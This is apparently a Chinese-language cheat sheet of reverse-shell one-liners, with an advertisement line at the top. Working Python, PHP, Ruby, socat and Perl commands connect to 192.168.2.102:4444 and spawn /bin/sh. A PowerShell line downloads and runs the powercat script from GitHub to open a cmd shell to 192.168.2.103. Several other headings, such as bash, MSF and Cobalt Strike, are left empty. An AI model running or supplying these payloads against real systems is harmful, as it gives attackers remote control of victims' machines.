合规国际互联网加速 OSASE为企业客户提供高速稳定SD-WAN国际加速解决方案。 广告
[TOC] ## Linux * bash反弹 * nc反弹 * curl反弹 * whois反弹 * python反弹 ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.102",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` * PHP反弹 ``` php -r '$sock=fsockopen("192.168.2.102",4444);exec("/bin/sh -i <&3 >&3 2>&3");' ``` * ruby反弹 ``` ruby -rsocket -e'f=TCPSocket.open("192.168.2.102",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ``` * socat反弹 ``` [socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.2.102:4444]() ``` * Perl反弹 ``` perl -e 'use Socket;$i="192.168.2.102";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` ## Windows * powercat反弹 ``` ①用IEX下载远程PS1脚本回来权限绕过执行使用powershell执行IEX (New-ObjectSystem.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.2.103 -p 4444 -e cmd ``` ``` ② powercat下载地址:https://github.com/besimorhino/powercat //下载到本地执行powercat为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat ``` * NC反弹 * nishang反弹 * Reverse UDP shell * MSF反弹 * Cobalt strike反弹shell ~~~